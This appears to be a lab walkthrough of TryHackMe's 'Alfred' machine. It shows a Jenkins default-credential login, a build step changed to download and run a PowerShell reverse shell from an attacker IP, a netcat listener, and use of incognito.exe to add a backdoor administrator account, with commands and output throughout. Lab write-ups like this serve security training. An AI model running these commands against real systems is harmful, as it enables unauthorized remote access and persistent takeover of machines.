Table of contents
Alfred is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
Enumeration
The output of the nmap
scan:
nmap -sC -sV 10.10.0.34
80/tcp open Microsoft IIS httpd 7.5
3389/tcp open ssl/ms-wbt-server?
8080/tcp open Jetty 9.4.z-SNAPSHOT
Port 8080
contains Jenkins
login page. According to Jenkins
documentation, default credentials should be the admin:password
pair, but this is not the case. The first option to check is other “default” password pairs. admin:admin
will do the trick this time.
Exploitation
A few words about Jenkins
before we move on:
Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.
From the attacker’s perspective, this is a goldmine. First, you can execute system commands with it. Second, already-created projects and builds might contain a ton of priceless data.
We can see that Jenkins
already has a build for the project named, well, project
.
Navigate to the configurations of the project:
http://10.10.0.34:8080/job/project/configure
We are looking for the Build
section of it. You can see that to make a new build, Jenkins
execute a Windows bash command
and running whoami
command. Let’s replace the whoami
command and download a reverse shell to our Kali Linux
machine.
A common way to do that with the Windows box is to use something like nishang PowerShell
reverse shell.
Simply add the line to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337
Serve the HTTP server to host that file by executing the following command:
sudo python -m SimpleHTTPServer 80
Prepare a listener on the port 1337
with nc
:
sudo nc -nlvp 1337
We are done with preparations on the Kali Linux
side, let’s modify the Build
command in Jenkins
now. Replace the whoami
with the following:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')
Hit the Build Now
and take a break for a second. Jenkins
will make a new build and by doing that, it will also download and execute your reverse shell as a user bruce
.
PrivEsc
Let’s check what privileges the user bruce
has:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
The official guide covers only the way to do it with Metasploit
, but of course, you can do the same without it.
The role SeImpersonatePrivilege
allows you to impersonate a client. We can exploit that to gain privileged access to the local system. The official guide is also offering you the incognito
module for Metasploit
, but you can download it as a stand-alone binary. Transfer incognito.exe
to the machine in any preferred way. If you don’t have one, you can use this PowerShell
one-liner:
(New-Object System.Net.WebClient).DownloadFile("https://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")
When you will have your file on the box, you can impersonate NT AUTHORITY\SYSTEM
token as the official guide recommends you, but you could also create a new user with admin rights:
PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user carrotcake to host 127.0.0.1
[+] Successfully added user
PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
Here we are creating a new user carrotcake
with the password SuperSecretPassw0rd123
via incognito.exe
, and then adding this account to the local group Administrators
.
You can now try to log in to the box with a new account. We can use RDP
protocol as the port 3389
is open:
rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34
OR you can use the tool Remmina
instead of rdesktop
. It has a built-in screenshot taker and works way more stable in my taste. How to install Remmina
Takeaway
You don’t have to always look for a way to exploit the service. Sometimes you just need to use it
Understanding the environment can help you to achieve your goals
Creating a new user sometimes might be the easiest way to get persistent access to the system